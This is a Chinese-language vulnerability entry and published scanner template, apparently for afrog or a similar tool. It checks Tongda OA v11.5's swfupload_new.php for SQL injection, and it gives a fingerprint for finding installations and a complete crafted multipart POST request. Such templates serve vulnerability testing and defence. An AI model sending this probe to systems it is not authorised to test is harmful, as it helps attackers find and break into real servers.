漏洞描述
通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器敏感信息
app="TDXK-通达OA"
tongda-swfupload-new-sql-inject: 通达OA v11.5 swfupload_new.php SQL注入漏洞
PoC代码[已公开]
id: tongda-swfupload-new-sql-inject
info:
name: 通达OA v11.5 swfupload_new.php SQL注入漏洞
author: zan8in
severity: high
verified: true
description: |
通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器敏感信息
app="TDXK-通达OA"
reference:
- http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.5%20swfupload_new.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
set:
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /general/file_folder/swfupload_new.php
headers:
Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary{{rboundary}}
body: "\
------------WebKitFormBoundary{{rboundary}}
Content-Disposition: form-data; name=\"ATTACHMENT_ID\"\r\n\
\r\n\
1\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"ATTACHMENT_NAME\"\r\n\
\r\n\
1\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"FILE_SORT\"\r\n\
\r\n\
2\r\n\
------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"SORT_ID\"\r\n\
\r\n\
------------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'insert into FILE_CONTENT(')
expression: r0()